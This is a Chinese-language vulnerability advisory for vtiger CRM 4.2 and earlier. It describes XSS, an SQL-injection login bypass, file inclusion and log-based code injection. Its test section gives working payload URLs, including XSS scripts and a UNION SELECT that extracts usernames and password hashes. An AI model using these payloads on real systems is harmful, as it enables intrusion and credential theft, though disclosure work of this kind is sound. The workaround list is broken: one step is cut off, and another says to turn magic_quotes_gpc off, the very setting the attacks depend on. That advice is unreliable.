发布日期：2005-11-24
更新日期：2005-11-24

受影响系统：

vtiger vtiger CRM <= 4.2

描述：

---

BUGTRAQ  ID: 15562

vtiger是一款由一家印度公司维护的开放源码客户端关系管理系统（CRM）。

由于没有正确的过滤用户输入，导致vtiger CRM中存在多个输入验证错误，具体如下：

1) 多个跨站脚本漏洞

CRM中存在多个跨站脚本漏洞，例如，恶意的本地用户可以创建字段中包含有脚本代码的联系人、帐号或其他数据集，然后将该联系人链接发送给管理员，这样脚本代码就可能获得权限提升。

2) RSS中的远程跨站脚本

vtiger支持全面的RSS聚合模式，允许用户在CRM中读取所有喜欢的blog、新闻站点等内容。但是，在向客户端发送聚合内容之前没有执行输入检查，因此用户可以聚合恶意的blog或新闻站点等，然后使用脚本代码通过DOM提升权限。

3) 认证绕过

如果php.ini设置magic_quotes_gpc为Off的话，攻击者就可以通过输入伪造的用户名完全绕过认证过程。由于登录表单中存在SQL注入，因此类似于“foo' or '%'='”的用户名可导致以下SQL语句：

              SELECT     *
              FROM        users
              WHERE        user_name='admin'
              OR         '%'='%'
              AND         user_password='adAZ2jidC3H1M'

这样攻击者就可以通过返回判断认证是否成功。

4) SQL注入导致泄漏用户凭据

如果magic_quotes_gpc为Off的话，已登录用户就可以操控许多表单字段显示任意值，包括用户名和口令。

5) 不安全的文件包含

由于未经检查就将GET、POST、COOKIE和SESSION的变量传给了include()调用，因此攻击者可以通过%00字符包含任意本地文件系统的文件。

6) 执行任意代码

由于vtiger在用户会话的每个阶段都会执行一些记录，因此攻击者可以在任意字段中输入PHP代码、GET参数等，这样上述代码就可能注入到日志消息中。

<*来源：Christopher Kunz （christopher.kunz@hardened-php.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113285743515485&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert('document.cookie')%3C/script%3E

http://www.example.com/index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]

http://www.example.com/?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27

建议：

---

临时解决方法：

1. 限制通过.htaccess对vtigercrm*.log的访问
2. 将register_globals切换为
3. 关闭magic_quotes_gpc

厂商补丁：

vtiger
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vtiger.com/

浏览次数：3416
严重程度：0（网友投票）